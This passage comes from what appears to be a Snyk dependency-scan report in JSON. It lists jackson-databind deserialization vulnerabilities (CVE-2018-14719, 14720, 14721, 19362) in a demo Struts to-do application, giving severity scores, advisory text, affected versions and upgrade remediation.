"ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + 
"cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.195569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.84205", + "probability": "0.01052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14720" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-x2w5-5m2g-7h5m" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:22.141403Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:20:17Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:19:17Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:33.930153Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", + "title": "GitHub Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + 
"modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.120318Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.85805", + "probability": "0.01269", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14719" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-4gq5-ch57-c2mg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:23:45.326350Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:22:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:22:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.823657Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:46:43.143163Z" + 
}, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "cvssV3BaseScore": 6.8, + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.565013Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.85710", + "probability": "0.01257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14721" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9mxf-g3x6-wv74" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:25:40.161831Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:24:46Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:24:39Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.774444Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + 
"assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.690019Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19362" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c8hm-7hpq-7jhg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:19.256477Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.043196Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
